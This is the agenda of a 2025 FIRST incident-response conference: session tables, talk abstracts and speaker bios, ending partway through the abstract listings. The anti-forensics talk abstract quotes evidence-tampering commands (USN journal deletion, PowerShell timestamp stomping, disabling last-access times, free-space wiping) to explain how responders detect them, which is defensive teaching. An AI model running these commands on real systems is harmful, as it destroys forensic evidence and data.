Program Agenda
A preliminary agenda has been provided to help participants of the conference plan their travel prior to the publishing of the detailed agenda in March 2025.
The agenda is subject to change. The agenda times are reflected in local Central European Summer Time (UTC +2). All pre-conference and conference activities — including FIRST hosted social activities — will take place on premises at the Bella Center Copenhagen.
- Additional side meetings, SIG Meetings, and BoFs to be posted by end of April.
- Additional room designations to be posted at a later date.
About TLP Designations
If you are unfamiliar with the Traffic Light Protocol ("TLP"), please visit www.first.org/tlp for details. In the use case for FIRST events, TLP levels specifically indicate whether press, social media, and photography/videography may occur. You do not need to be "invited" to attend a TLP:RED session as a confirmed, registered delegate. Please see the Registration Terms & Conditions: Photography or Recording Usage by Attendees.
Meetings notated with "invite-only" or "invitation only" are private meetings.
Sunday Trainings
Sunday pre-conference training is a limited opportunity for interested conference delegates and locals who may not be planning to attend the full event. Separate registration is required.
Sessions Available to Virtual Participants
TLP:CLEAR sessions from Plenary talks, Breakout 1, Breakout 2, and Breakout 3 will be available to registered virtual participant ticket holders via the conference mobile/desktop app. Access information will be provided several days before the start of the event. Sunday Training content is NOT recorded.
Registration Hours & Location
Registration will be located on the 1st Floor of the Bella Center Copenhagen in “Foyer 3”.
Agenda At-A-Glance
If you have any questions regarding the agenda, please contact the event office via email at events@first.org.
Sunday, June 22nd
| Time | Social Activity |
|---|---|
| 17:30 – 18:00 | FIRST Newbie Session in Hall A1 |
| 18:00 – 20:00 | Sunday Welcome Reception - 1st Floor Balcony TLP:CLEAR |
Monday, June 23rd
| Time | Plenary (Hall A1) | Breakout 1 (Auditorium 10) | Breakout 2 (Auditorium 11) | Breakout 3 (Auditorium 12) | Social Activity |
|---|---|---|---|---|---|
| 08:30 – 09:30 | Conference Opening & Welcome Remarks TLP:CLEAR | | | | |
| 09:30 – 10:30 | Nina Sunde (Norwegian Police University College, NO) TLP:CLEAR | | | | |
| 10:30 – 11:00 | Networking Break with Exhibits TLP:CLEAR | | | | |
| 11:00 – 11:35 | What Can Cybersecurity Incident Responders Learn from Real-World Crises? – Matt Palmer (Jersey Cyber Security Centre, JE) TLP:CLEAR | From Unstructured CTI Reports to Yara/SPL via LLMs – Aaron Kaplan (independent / EC-DIGIT-CSIRC, AT); Jürgen Brandl (BMI, AT); Chris Horsley (Cosive, AU) TLP:GREEN | From TTPs to Deception: Crafting Strategies – Diego Staino (BASE4 Security, AR); Federico Pacheco (BASE4 Security, ES) TLP:CLEAR | | |
| 11:45 – 12:20 | Case: City of Helsinki Data Breach 2024 – Matias Mesiä (NCSC-FI, FI) TLP:CLEAR | We All Want Validation (in our SecOps Detections) – John Stoner (Google Cloud, US) TLP:CLEAR | Breaking Down Barriers: Analyzing Active Directory Security Across Industries – Gary Sun, Vivian Teng (CyCraft Technology, TW) TLP:CLEAR | | |
| 12:20 – 14:00 | Lunch Break TLP:CLEAR | | | | |
| 14:00 – 14:35 | Building Towards #SquadGoals - Brick by Brick to a Unified Cyber Response Effort – Michael S (National Cyber Security Centre - United Kingdom, GB) TLP:CLEAR | A Look at New ASNs – John Kristoff (Dataplane.org, US) TLP:CLEAR | Uncovering the Whispers of an APT Targeting Specific Industries in South Asia – Sathwik Ram Prakki, Subhajeet Singha (Quick Heal, IN) TLP:CLEAR | | |
| 14:45 – 15:20 | Securing a Global Conglomerate: Mitsui & Co.'s Journey from Chaos to Control – Takahiro Okuhara (MITSUI & CO., LTD., JP) TLP:AMBER | Anti-Forensics - You are Doing it Wrong (Believe Me, I'm an IR Consultant) – Stephan Berger (InfoGuard AG, CH) TLP:CLEAR | Where Did I Put My Keys? Preventing Data Leaks at Scale with Automation – Braxton Plaxco (Red Hat, US) TLP:GREEN | | |
| 15:20 – 15:50 | Networking Break with Exhibits TLP:CLEAR | | | | |
| 16:00 – 17:15 | FIRST AGM (Annual General Meeting) | | | | |
| 17:30 – 19:30 | | | | | Sponsor Showcase & Networking Reception TLP:CLEAR |
Tuesday, June 24th
| Time | Plenary (Hall A1) | Breakout 1 (Auditorium 10) | Breakout 2 (Auditorium 11) | Breakout 3 (Auditorium 12) |
|---|---|---|---|---|
| 09:00 – 09:35 | From Zero to Prepared: Implementing a Weekly Incident Response Drill Program – Jeffrey Carpenter (Accuray, Inc., US) TLP:CLEAR | Justin Novak, Chris Rodman (Software Engineering Institute, US) TLP:CLEAR | Response via Prevention Engineering – Steve McKinney, Lauren Tam (Stripe, US) TLP:AMBER | |
| 09:45 – 10:20 | Incident Preparedness Takeaways from 5000 Exercise Participants – Erlend Andreas Gjære (Secure Practice, NO) TLP:CLEAR | 99 Bottles of Trust on the Wall: Approaches to Building Convivial Communities – Trey Darley (Liaison, BE); Tom Millar (CISA, US) TLP:CLEAR | Anton Kalinin (Principal Security Consultant at CSIS Security Group A/S, First member, DK) TLP:RED | |
| 10:20 – 10:50 | Networking Break with Exhibits TLP:CLEAR | | | |
| 10:45 – 11:20 | Pivoting To Resilience: Disruptive Incidents And How We Prepare For Them – Tom Millar (CISA, US); Eireann Leverett (Killara Cyber, GB); Wendy Nather (None, US); Hendrik Adrian (LACERT, JP) TLP:CLEAR (10:45 – 12:05) | Konstantin Zangerle (KIT-CERT, DE) TLP:CLEAR | Why Be the King When You Can Be the Rogue Prince? Insights from Scraping of I2P and Freenet – Lorenzo Nicolodi (Microlab.red, IT) TLP:AMBER | |
| 11:30 – 12:05 | (Pivoting To Resilience continues) | Aztronomy: Establishing the Foundation of Attack Path Analysis in Azure – Tung-Lin Lee (Cycraft, TW) TLP:CLEAR | Routing Security for Enterprises: Secure Your Supply Chain – Andrei Robachevsky (Global Cyber Alliance, NL) TLP:CLEAR | |
| 12:05 – 13:30 | Lunch Break TLP:CLEAR | | | |
| 13:30 – 14:05 | Building the Blueprint: Designing Effective Storyboards for Cybersecurity Tabletop Exercises – John Hollenberger (Secureworks, US); Aamir Lakhani (Fortinet, US) TLP:CLEAR | It Wasn't Me - Sharing Threat Intel Anonymously using Abracadabra – Andras Iklody (CIRCL, LU); Trey Darley (Liaison, BE) TLP:CLEAR | Apollo Program : From Planet Earth to Space! – Jun Hyeong Lee (PLAINBIT) TLP:AMBER | |
| 14:15 – 14:50 | Social Engineering in the Age of AI: Rethinking Security Training – Cornelia Puhze (SWITCH-CERT, CH) TLP:CLEAR | AWS Advanced Offensive Techniques, What Defenders Need to Know – Santiago Abastante (Solidarity Labs, AR) TLP:CLEAR | Persona Theory: Infiltration & Deception of Emerging Threat Groups – Tammy Harper (Flare, CA) TLP:AMBER | |
| 15:00 – 15:35 | RE(HACK)T: Open-Sourcing a Boardgame for User Awareness – Emilien Le Jamtel, Francien Giebels, Marton Szabo (CERT-EU, BE) TLP:CLEAR | Masato Suzuki, Shota Sugawara, Atsushi Kobayashi, Hirofumi Kawauchi (NTT-ME CORPORATION, JP) TLP:CLEAR | Jan Kaastrup (CSIS Security Group, DK); Michael Sjøberg (Delta Crisis Management, DK) TLP:AMBER | |
| 15:35 – 16:05 | Networking Break with Exhibits TLP:CLEAR | | | |
| 16:05 – 17:05 | Lightning Talks! | | | |
Wednesday, June 25th
| Time | Plenary (Hall A1) | Breakout 1 (Auditorium 10) | Breakout 2 (Auditorium 11) | Breakout 3 (Auditorium 12) | Social Activity |
|---|---|---|---|---|---|
| 08:45 – 09:00 | Wednesday Remarks TLP:CLEAR | | | | |
| 09:00 – 10:00 | Søren Maigaard (SektorCERT, DK) TLP:CLEAR | | | | |
| 10:00 – 10:30 | Networking Break with Exhibits TLP:CLEAR | | | | |
| 10:30 – 11:05 | Best Practices for Data Privacy Breach Response: Lessons Learned from Social Media Case Studies – Anne Connell, Lauren Cooper (CERT Software Engineering Institute Carnegie Mellon University, US) TLP:CLEAR | From p0f to JA4+: Network Fingerprinting and Reconnaissance – Vlad Iliushin (Cybersecurity Expert @ ELLIO, President of AMTSO (Anti-Malware Testing Standards Organization), CZ) TLP:CLEAR | Inside the Information Stealer Ecosystem: From Compromise to Countermeasure – Olivier Bilodeau (Flare, CA); Nick Ascoli (Flare, US) TLP:CLEAR | | |
| 11:15 – 11:50 | Why is Finnish Healthcare Doing So Well Against Ransomware? – Perttu Halonen (National Cyber Security Centre Finland, FI) TLP:CLEAR | Beyond CVEs: Mastering the Landscape with Vulnerability-Lookup – Alexandre Dulaunoy (CIRCL, LU) TLP:CLEAR | Crypted Hearts: Exposing the HeartCrypt Operation – Daniel Bunce (Palo Alto Networks, Unit 42, DE); Jerome Tujague (Palo Alto Networks, Unit 42, US) TLP:GREEN | | |
| 11:50 – 13:15 | Lunch Break TLP:CLEAR | | | | |
| 13:15 – 13:50 | Enhancing Incident Response with AWS CIRT, MSSPs, and ISVs – Matthew Gurr (Full Membership via Amazon, AU) TLP:CLEAR | Evading in Plain Sight: How Adversaries Beat User-Mode Protection Engines – Omri Misgav (Independent, IL) TLP:CLEAR | Claudiu Chelaru (Mnemonic, DK) TLP:CLEAR | | |
| 14:00 – 14:35 | Beyond Scanners and Tickets: A New Paradigm for Attack Surface Management – Eirik Nordbø, Anders Nese (Equinor ASA, NO) TLP:CLEAR | The Dark Side of Digital Ads: How to Protect Your Brand using Meta AD Library – Giuseppe Morici, Grazia Leonetti (Intesa Sanpaolo S.p.A., IT) TLP:AMBER | Anthony Talamantes, Todd Kight (Johns Hopkins University Applied Physics Laboratory, US) TLP:CLEAR | | |
| 14:45 – 15:20 | Piotr Kijewski (The Shadowserver Foundation, NL) TLP:CLEAR | What Can Threat Intel Teams Learn from Journalists? – Chris Horsley (Cosive, AU) TLP:CLEAR | Broken Seals, Broken Trust: Flaws and Defences in the Certificate Ecosystem – Yuta Sawabe, Rintaro Koike (NTT Security Holdings, JP) TLP:CLEAR | | |
| 19:00 – 22:00 | | | | | Conference Social Event TLP:CLEAR |
Thursday, June 26th
| Time | Plenary (Hall A1) | Breakout 1 (Auditorium 10) | Breakout 2 (Auditorium 11) | Breakout 3 (Auditorium 12) |
|---|---|---|---|---|
| 09:00 – 09:35 | Avengers Assemble: Collaborating Across the Globe to Create Joint Cybersecurity Advisories – Bonnie Limmer (Cybersecurity and Infrastructure Security Agency (CISA), US); Keir P (UK's National Cyber Security Centre (NCSC-UK), GB); Jane O'Loughlin (CERT New Zealand, NZ) TLP:GREEN (09:00 – 10:20) | The Funny Story of Active Directory Backdooring – Sylvain Cortes (Hackuity, FR) TLP:CLEAR | Detection Engineering 101 : Establishing a Structured Approach to Detection Engineering – Tomohisa Ishikawa (Tokio Marine Holdings, US) TLP:CLEAR | |
| 09:45 – 10:20 | (Avengers Assemble continues) | Nicklas Keijser (Truesec CSIRT – Truesec, SE); Anders Olsson (Truesec, SE) TLP:CLEAR | Navigating the Threat Actor Maze: A Tool for Mapping Names, Families and Insights – Dave Matthews (Avast (Gen Digital), AU) TLP:CLEAR | |
| 10:20 – 10:50 | Networking Break with Exhibits TLP:CLEAR | | | |
| 10:45 – 11:20 | Engaging with the Media to Foster Cybersecurity Resilience – Zivile Necejauskaite (NRD Cyber Security, LT); Madara Krutova (Latvia's CERT.LV, part of the National Cybersecurity Centre, LV) TLP:CLEAR | Alex Holden (Hold Security LLC, US) TLP:CLEAR | Understand and Detect - Stealthy Techniques Used to Conceal Artifacts on Modern Linux Systems – Robert Byrne (Ericsson, AU) TLP:GREEN | |
| 11:30 – 12:05 | All Ransomware Economic Models are Wrong, But This One is Useful – Eireann Leverett (Killara Cyber, GB) TLP:CLEAR | Lazarus Group Evolved Their Infection Chain with Old and New Malware – Sojun Ryu (Kaspersky) TLP:CLEAR | A Story about Fighting Disinformation or How We Helped the Russian Trolls – Krassimir Tzvetanov (Purdue University, US) TLP:GREEN | |
| 12:05 – 13:30 | Lunch Break TLP:CLEAR | | | |
| 13:30 – 14:05 | Burnout: Detect, Investigate, Respond, Recover, Prevent – Desiree Sacher (Finanz Informatik, DE); Carson Zimmerman (Microsoft, US) TLP:CLEAR | Threat Hunting with Python & Pandas – Anthony Talamantes, Matt Dulle (Johns Hopkins University Applied Physics Laboratory, US) TLP:CLEAR | Revolutionizing Malware Analysis with Agentic AI: Lessons and Innovations – Justin Page (Booz Allen Hamilton, US) TLP:CLEAR | |
| 14:15 – 14:50 | Unmasking Cyber Security: Rethinking Small to Medium Business Security Awareness – Sophie Horgan (NCSC, NZ) TLP:CLEAR | What's New in CSAF v2.1: Key Updates Explained – Justin Murphy (DHS/CISA, US); Thomas Schmidt (BSI, DE) TLP:CLEAR | Using DNS Registry and Requests for Securing Dot Pl and Beyond – Piotr Białczak, Paweł Pawlński (CERT.PL/NASK, PL) TLP:GREEN | |
| 15:00 – 15:35 | Developing a Sectoral CERT Ecosystem – Albert Antwi-Boasiako, Stephen Cudjoe-Seshie (Cyber Security Authority, GH) TLP:GREEN | The Convergence of Threat Behaviors Across Intrusions – Joe Slowik (The MITRE Corporation, US) TLP:CLEAR | Emilien Le Jamtel (CERT-EU, BE) TLP:GREEN | |
| 15:45 – 16:15 | Networking Break with Exhibits TLP:CLEAR | | | |
| 16:15 – 17:15 | Lightning Talks! | | | |
Friday, June 27th
| Time | Plenary (Hall A1) | Breakout 1 (Auditorium 10) | Breakout 2 (Auditorium 11) | Breakout 3 (Auditorium 12) |
|---|---|---|---|---|
| 09:00 – 09:35 | Serge Droz (FIRST / Swiss FDFA, CH) TLP:CLEAR | Automated ATT&CK Technique Chaining – Martin Eian (mnemonic, NO) TLP:CLEAR | Forecasting Cybersecurity Data: Making Sense of the Senseless – Leigh Metcalf (CERT, US) TLP:CLEAR | |
| 09:45 – 10:20 | Southern African Development Community's CII handbook - What Others Can Re-Use? – Vilius Benetis (NRD Cyber Security, LT); Shukya Kiroga (CRASA - The Communication Regulators' Association of Southern Africa, BW) | Artemis: How CERT PL Improves the Security of the Polish Internet – Krzysztof Zając (CERT PL, PL) TLP:CLEAR | Hossein Jazi, Douglas Santos (Fortinet, CA) TLP:CLEAR | |
| 10:30 – 11:05 | Hikohiro Lin (GMO Cybersecurity by IERAE, Inc., JP); Ken Lee (Independent Security Advisor, TW); Kosuke Ito (Product Security Governance Advisor, JP) TLP:AMBER | Only Seeing Stars: Enabling the Open Source Scripting Community with OCSF – Michael Bunner (REI, US) TLP:CLEAR | Establishing a Global Community of Practice on Coordinated Vulnerability Disclosure (CVD) – Tomo Ito (JPCERT Coordination Center, JP); Justin Murphy (DHS/CISA, US) TLP:CLEAR | |
| 11:15 – 11:50 | Denys Yashchuk (CERT-UA, UA) TLP:GREEN | The Party Isn't Over: Uncovering Konfety's Novel "Evil Twin" Technique – Lindsay Kaye, Gavin Reid (HUMAN Security, US) TLP:CLEAR | Comprehensive Investigation Results on Malware Code Interpretation by GPT-4 – Yasuuyuki Tanaka (NTT Social Informatics Laboratories, JP) TLP:CLEAR | |
| 11:50 – 12:20 | Networking Break TLP:CLEAR | | | |
| 12:20 – 13:20 | Friday Keynote TLP:CLEAR | | | |
| 13:20 – 13:50 | Closing Remarks TLP:CLEAR | | | |
| 13:50 – 14:20 | Lunch Break TLP:CLEAR | | | |
- TLP:CLEAR
99 Bottles of Trust on the Wall: Approaches to Building Convivial Communities
Trey Darley (Liaison, BE), Tom Millar (CISA, US)
Trey Darley has been a long-standing member of the FIRST community, and has served in a variety of volunteer roles, including a term on the FIRST board, during which he co-founded the FIRST standards committee. Trey is well known for his work on open cybersecurity standards like STIX/TAXII and others. He has also been aligned with the Langsec faction for many years. Trey's patron saints are Grace Hopper, Evi Nemeth, and Paul Erdős.
Mr. Millar has served in CISA since 2009, working to strengthen the nation's cyber defenses and resilience against emerging threats. His work has included increasing the level of public, private and international partner engagement, and supporting initiatives to improve information sharing, such as the standardization of the Traffic Light Protocol. As the Branch Chief of Cyber Resilience within the Cyber Security Division, he oversees CISA's architectural cybersecurity assessments, the Cybersecurity Performance Goals program, and training and standards for assessment performance. Prior to his cybersecurity career, he served as a linguist with the 22nd Intelligence Squadron of the United States Air Force. Mr. Millar holds a Master of Science from the George Washington University and is a Distinguished Graduate of the National Defense University's College of Information and Cyberspace.
In the face of increasing threats to the stability of the Internet and our other critical infrastructure, it's crucial for FIRST community members to know how to best build and leverage their personal networks to collectively respond to all types of incidents, especially those that seek to disrupt our supply chains and national critical infrastructure. In this presentation, attendees will learn how to make the most of their FIRST membership by building stronger connections with their community partners, creating strong trusted relationships that go deeper than simply being part of a shared workspace or a mailing list.
June 24, 2025 09:45-10:20
- TLP:CLEAR
A Look at New ASNs
John Kristoff (Dataplane.org, US)
John is a PhD candidate in Computer Science at the University of Illinois Chicago. He is a co-founder of Dataplane.org and serves as a research fellow at ICANN. He is a principal analyst at NETSCOUT on the ATLAS Security Engineering and Response Team (ASERT). John's primary career interests, experience, and expertise are in Internet infrastructure. He is particularly focused on better understanding and improving the routing system (BGP), the naming system (DNS), and internetwork security. John is or has been associated with a number of other organizations and projects involving Internet operations and research, some of which include: DNS-OARC, DePaul University, Dragon Research Group (DRG), IETF, FIRST, Internet2, NANOG, Neustar - formerly UltraDNS, Northwestern University, nsp-security, ops-trust, REN-ISAC, and Team Cymru.
In the first half of 2024 over 3000 new autonomous system numbers (ASNs) were registered and assigned. Approximately one third of them were originating one or more IP address prefixes during that same time frame. This got us to thinking. What are some of the characteristics of these new ASNs? What impact, if any, do they have on the security landscape, and just as importantly, what risks do they face upon arrival? This presentation is a first look at some of our results including the relatively short dwell time from their appearance on the Internet to when they first receive or participate in DDoS attacks.
June 23, 2025 14:00-14:35
- TLP:GREEN
A Story about Fighting Disinformation or How We Helped the Russian Trolls
Krassimir Tzvetanov (Purdue University, US)
For the past five years Krassimir Tzvetanov has been a graduate student at Purdue University focusing on Homeland Security, Threat Intelligence, Operational Security and Influence Operations, in the cyber domain.
At Purdue University, Krassimir works as a researcher for the Purdue Homeland Security Institute and is a junior fellow at the FORCES program with the School of Communication.
Before that, Krassimir was a security engineer at a small CDN, where he focused on incident response, investigations and threat research. Previously he worked for companies like Cisco and A10, focusing on threat research and information exchange, DDoS mitigation, and product security. Before that, Krassimir held several operational (SRE) and security positions at companies like Google, Yahoo!, and Cisco.
Krassimir is very active in the security research and investigation community and has contributed to FIRST SIGs. He is also a co-founder and ran the BayThreat security conference, and has volunteered in different roles at DefCon, ShmooCon, and DC650.
Krassimir holds a PhD with a focus on Information Technology in Homeland Security and is finishing his second PhD, focusing on hybrid warfare and influence operations conducted through social media. He also holds a Master's in Digital Forensics and Investigations, a Master's in Homeland Security, and a Bachelor's in Electrical Engineering.
Over the past decade, the term "fake news" has become so common that most people turn off the TV when they hear it. So, how is that publicity serving society? Let me even ask a more controversial question: how is this publicity helping the enemy? Half-baked intellectuals are talking about "active measures" without even realizing the translation of the original Russian term is fairly limited and does not capture the depth of the wording. However, they go around teaching us how this adversary did this and that adversary did that... Those same people count Russian bots and tell us how they are convincing people, while they do not even grasp basic communication theory concepts. "Beware of Greeks bearing gifts" has a whole new meaning in today's information age. It reads more like "beware of geeks bearing gifts". Have you ever considered that maybe, just maybe, this is exactly what the adversaries want them to talk about? Have you considered what the second and third order effects are from simple messaging, aka propaganda? And is that what the adversary really wants to accomplish?
In this talk I'll cover the basics of the so-called reflexive influence operations and how they can be used to entice parts of the target audience to emit messaging congruent with the adversary's objectives. I'll also provide some examples of what appear to be such types of operations.
June 26, 2025 11:30-12:05
- TLP:CLEAR
All Ransomware Economic Models are Wrong, But This One is Useful
Eireann Leverett (Killara Cyber, GB)
Eireann Leverett is the CTO of Killara Cyber, and a long-time collaborator with FIRST. He has risen through the roles of penetration tester, incident responder, researcher, and risk analyst to his current role. He has written many articles and one book, and has a deep interest in critical infrastructure, technology and risk, and catastrophe economics. He's like the little kid on this panel of international experts, and excited to be at the table!
How much ransomware is out there, and what is the cost to companies?
Economic modelling of cyber crime is not often discussed at FIRST, but perhaps it should be. It impacts everything, from budgets, team numbers, to response strategies, to risk management. If we can accurately model cyber crime costs, we can unify responses across countries, or collaborate more effectively. It also helps with scaling the maturity of teams within FIRST. This presentation is about constructing, using, releasing, and validating an open source ransomware economics model. It is also about the challenges, the data, and the quantification tasks required to do so. Partnering with financial institutions isn't easy, but it does help us get our ideas of how to respond to cyber crime across.
Are you a regulator, or a cyber insurer? Are you an incident responder or data scientist who is model curious, or a willing code contributor? Help us make useful models, and use them to help solve the ransomware crisis.
June 26, 2025 11:30-12:05
- TLP:CLEAR
Anti-Forensics - You are Doing it Wrong (Believe Me, I'm an IR Consultant)
Stephan Berger (InfoGuard AG, CH)
Stephan Berger has over a decade of experience in cybersecurity. Currently working with the Swiss-based company InfoGuard, Stephan investigates breaches and hacked networks as Head of Investigation of the Incident Response team. An avid Twitter user under the handle @malmoeb, he actively shares insights on cybersecurity trends and developments. Stephan also authors the blog DFIR.ch, where he provides in-depth analysis and commentary on digital forensics and incident response. Stephan has spoken at numerous conferences, sharing his expertise with audiences worldwide.
In this talk, we'll dissect common anti-forensics strategies -- like USN Journal deletion, shellbag clearing, timestamp manipulation, and disabling access time updates -- and reveal how they are often executed ineffectively or misunderstood. We'll explore practical examples, such as:
- Deleting the USN Journal (fsutil usn deletejournal /d C:) and why it's rarely a perfect solution.
- Clearing shellbags to wipe File Explorer history but failing to account for deeper registry artifacts.
- Time stomping ((Get-Item "C:\path\to\file.txt").CreationTime = "2022-01-01 00:00:00") and how forensic tools detect inconsistencies.
- Disabling last access time updates (fsutil behavior set disablelastaccess 1) and its limited effectiveness against comprehensive timeline analysis.
- Wiping MFT free space (sdelete -z C:) while ignoring the traces left behind in unstructured data.
From registry edits like masking user account activity to configuring Windows EFS, we'll examine why these techniques often fail against modern investigative workflows and how defenders use these "footprints of erasure" to uncover malicious intent.
Attendees will gain a comprehensive understanding of what works and what doesn't, and how to identify these techniques during incident response. Whether you're an IR consultant, security analyst, or blue teamer, this talk offers actionable knowledge to outsmart adversarial anti-forensics tactics.
We use Python code to show how 'clean' evidence cleaning can be done, e.g., if only individual MFT entries are deleted, or even if entries in the SRUM database are deleted or manipulated. In those cases it is not immediately obvious that the data has been manipulated, unlike when everything is deleted.
June 23, 2025 14:45-15:20
- TLP:AMBER
Apollo Program : From Planet Earth to Space!
Jun Hyeong Lee (PLAINBIT)
I have been working in the DFIR field in Korea for over 10 years. Our company's DFIR analyst organization is the largest single organization in Korea, and I am the head of that organization. I have analyzed and solved famous digital forensics cases in Korea, and currently, I analyze and respond to breaches using digital forensics, track attackers, and collaborate with Korean investigative agencies to catch criminals.
Until now, our primary perspective on defense has been the organization. Defense against attacks on individuals, introduced in this presentation, is different from organizational defense, and it should be. So far, the methods available to counter attacks on individuals have been limited and often ineffective, mainly because the methods vary by case. In the hope of opening a discussion between global analysts to seek new methods (building bridges) to protect individuals, rooted in the previous security experience (walls) that protected organizations, just like the theme of "Fortresses of the Future: Building Bridges, Not Walls", this presentation covers how the attackers build infrastructure and use it, how they monitor individual victims, their methods of stealing cryptocurrencies, and the behaviors related to their attacks, all through digital forensics analysis.
June 24, 2025 13:30-14:05
- TLP:CLEAR
Artemis: How CERT PL Improves the Security of the Polish Internet
Krzysztof Zając (CERT PL, PL)
Senior Threat Analysis Specialist at CERT PL, currently working on automated vulnerability discovery techniques. Before becoming a security specialist, he was a software engineer with more than ten years of experience. Teaches offensive security at the University of Warsaw. Formerly a CTF player, playing with the p4 CTF team. Likes cats and bad puns.
Since the beginning of 2023, CERT PL has been periodically scanning more than 900 thousand domains and IP addresses of universities, hospitals, government institutions, schools, banks and other organizations, and detecting hundreds of thousands of vulnerabilities and misconfigurations (including high-severity ones, such as SQL Injection, in important entities).
For that task we built a custom tool: Artemis (https://github.com/CERT-Polska/Artemis). It checks various aspects of website security and builds easy-to-read messages informing organizations about the scanning results.
During the presentation, I will show how Artemis works, what we are looking for, and most significantly - lessons we've learned during our large-scale scanning project. As the tool is open-source, I will touch upon how to set up your own scanning pipeline.
June 27, 2025 09:45-10:20
- TLP:CLEAR
Automated ATT&CK Technique Chaining
Martin Eian (mnemonic, NO)
Dr. Martin Eian is a Researcher at mnemonic. He has more than 20 years of work experience in IT security, IT operations, and information security research roles. In addition to his position at mnemonic, he is a member of the Europol EC3 Advisory Group on Internet Security. He has previously worked as the Head of Research at mnemonic, as an Adjunct Associate Professor at the Norwegian University of Science and Technology (NTNU), as a Threat Intelligence analyst at mnemonic, and as an Information Security Specialist at Nordea. He holds a PhD in Telematics from NTNU (2012). His current research topics are threat intelligence automation, quantitative cyber risk analysis, vulnerability measurements and analysis, and alert aggregation and contextualization. He has previously presented at the FIRST Annual Conference, the ONE Conference, and at Black Hat USA Arsenal.
Incident response teams need to determine what happened before and after an observation of adversary behavior in order to effectively respond to incidents. The MITRE ATT&CK knowledge base provides useful information about adversary behaviors, but provides no guidance on what most likely happened before and after an observed behavior. We have developed methods and open source tools to help incident responders answer the questions "What most likely happened prior to this observation?" and "What are the adversary's most likely next steps given this observation?". To be able to answer these questions, we combine semantic modeling of subject matter expert knowledge with data-driven methods trained on data from computer security incidents.
June 27, 2025 09:00-09:35
- TLP:GREEN
Avengers Assemble: Collaborating Across the Globe to Create Joint Cybersecurity Advisories
Bonnie Limmer (Cybersecurity and Infrastructure Security Agency (CISA), US), Keir P (UK's National Cyber Security Centre (NCSC-UK), GB), Jane O'Loughlin (CERT New Zealand, NZ)
Bonnie Limmer is the Chief of Production within the Cybersecurity Division of the Cybersecurity and Infrastructure Security Agency (CISA). Evolving in this role for the past 10 years, Bonnie started her federal career within the legacy US-CERT organization. Currently, her team leads CISA's cyber information sharing mission to create, coordinate, and release operational cyber alerts, advisories, and guidance on known cyber threats and vulnerabilities impacting government and critical infrastructure networks. Her role is at the center of CISA cyber operations to respond to cyber incidents that impact national security. It's a chaotic and exciting mission space, and a place where adrenaline junkies can thrive.
Keir is the Head of Strategic Response at the UK's National Cyber Security Centre (NCSC-UK). He focuses on developing the NCSC-UK and UK Government response to significant cyber events in order to reduce harm to the wider UK ecosystem. Keir sees partnership, collaboration and community as the best way of tackling our common set of challenges. Keir has been with NCSC-UK since its foundation in 2016, having previously worked in incident response in the NCSC's precursor organisation, CERT-UK. Keir has had wide experience at both a technical and strategic level in dealing with a variety of prominent cyber events with significant impact, both in the UK and across the globe.
When government cyber agencies release a cybersecurity advisory, especially an advisory that is co-sealed with multiple international government partners, it represents the collaboration, combined insights, and expertise of a global coalition. The coordination that goes into these advisories is an intricate dance. These joint advisories are not just a collection of data points; they are meticulously crafted with input from a broad spectrum of partners and perspectives, including industry leaders and international counterparts. This session will provide a rare glimpse into the intricate, collaborative process behind these advisories -- highlighting how the panelists, together with their partners and within their organizations, prioritize accuracy, relevance, and actionable guidance.
June 26, 2025 09:00-10:20
- AR TLP:CLEAR
AWS Advanced Offensive Techniques, What Defenders Need to Know
Santiago Abastante (Solidarity Labs, AR)
Former Police Officer from Argentina, now a Cloud Incident Responder and Security Engineer with over 10 years of IT experience. A Digital Nomad and an international speaker, I've presented on Cloud Security and Incident Response at Ekoparty, FIRST, Virus Bulletin (three times), Hack.Lu, and various BSides events worldwide. I hold a Bachelor's degree in Information Security and an MBA (Master in Business Administration).
In this technical, demo-driven session, we'll explore the tactics and techniques attackers use to compromise infrastructures in Amazon Web Services (AWS), from initial access to achieving advanced persistence. Using known threat actor techniques in an adversary emulation approach, we'll examine common attack vectors such as credential exploitation, privilege escalation, and lateral movement, along with advanced persistence methods that allow attackers to maintain control of compromised environments. Defensive and detection strategies will be highlighted, leveraging both AWS-native services and external tools, helping security teams strengthen their defenses. This session promises a practical, real-world experience for attendees.
June 24, 2025 14:15-14:50
- TW TLP:CLEAR
Aztronomy: Establishing the Foundation of Attack Path Analysis in Azure
Tung-Lin Lee (Cycraft, TW)
Tung-lin Lee is a cybersecurity researcher at CyCraft Technology, specializing in network and cloud security. He has presented at several industry conferences, including HITCON ENT, ROOTCON, InfoSec Taiwan, and CyberSec.
In our journey of developing an attack path analysis tool for Azure, we encountered several obstacles, primarily derived from outdated and unclear documentation of Entra APIs, which is partially mitigated by the amazing open-source project Bark. However, the issue was further compounded by API permission misalignments across different APIs, such as the Provisioning API and Azure AD Graph API. In addition, the rising prevalence of research into undocumented APIs reveals a neglected attack surface. Moreover, we discovered that the token redemption mechanisms behind the Azure Portal present additional attack vectors. By manipulating the mechanisms, threat actors would abuse multiple undocumented APIs & expand Microsoft Graph permission scopes after obtaining a single refresh token. To address these risks, we are developing an open-source framework for precise identity risk assessments in Azure and laying the groundwork for building safer security solutions.
June 24, 2025 11:30-12:05
- UA TLP:GREEN
Behind the Mask
Denys Yashchuk (CERT-UA, UA)
Denys Yashchuk - Deputy Chief at CERT-UA. Leads the Threat Intelligence and Malware Analysis team, specializing in proactive threat detection and analysis. Has worked for CERT-UA for over six years. Possesses extensive experience in cybersecurity, with a particular focus on threat analysis, hunting, clustering, cyber attack attribution and intelligence sharing.
The full-scale invasion of Ukraine by Russia is accompanied by a significant number of cyberattacks. We have unique experience in defending ourselves against cyberattacks of different severity, investigating various cyber incidents, from phishing to intrusions into networks. Clustering cyber threats helps organize information, making it easier to share details and provide context, so everyone understands the nature of the threat. During the presentation, we will talk about CERT-UA's classification (UAC-XXXX) of cyber threats and how it correlates with widely known names. The main part of it will describe the most active clusters, their TTPs, and present real cases of attacks. In the end, we will talk briefly about the main causes and vulnerabilities in security systems that make cyber-attacks possible and how to handle them.
June 27, 2025 11:15-11:50
- US TLP:CLEAR
Best Practices for Data Privacy Breach Response: Lessons Learned from Social Media Case Studies
Anne Connell (CERT Software Engineering Institute Carnegie Mellon University, US), Lauren Cooper (CERT Software Engineering Institute Carnegie Mellon University, US)
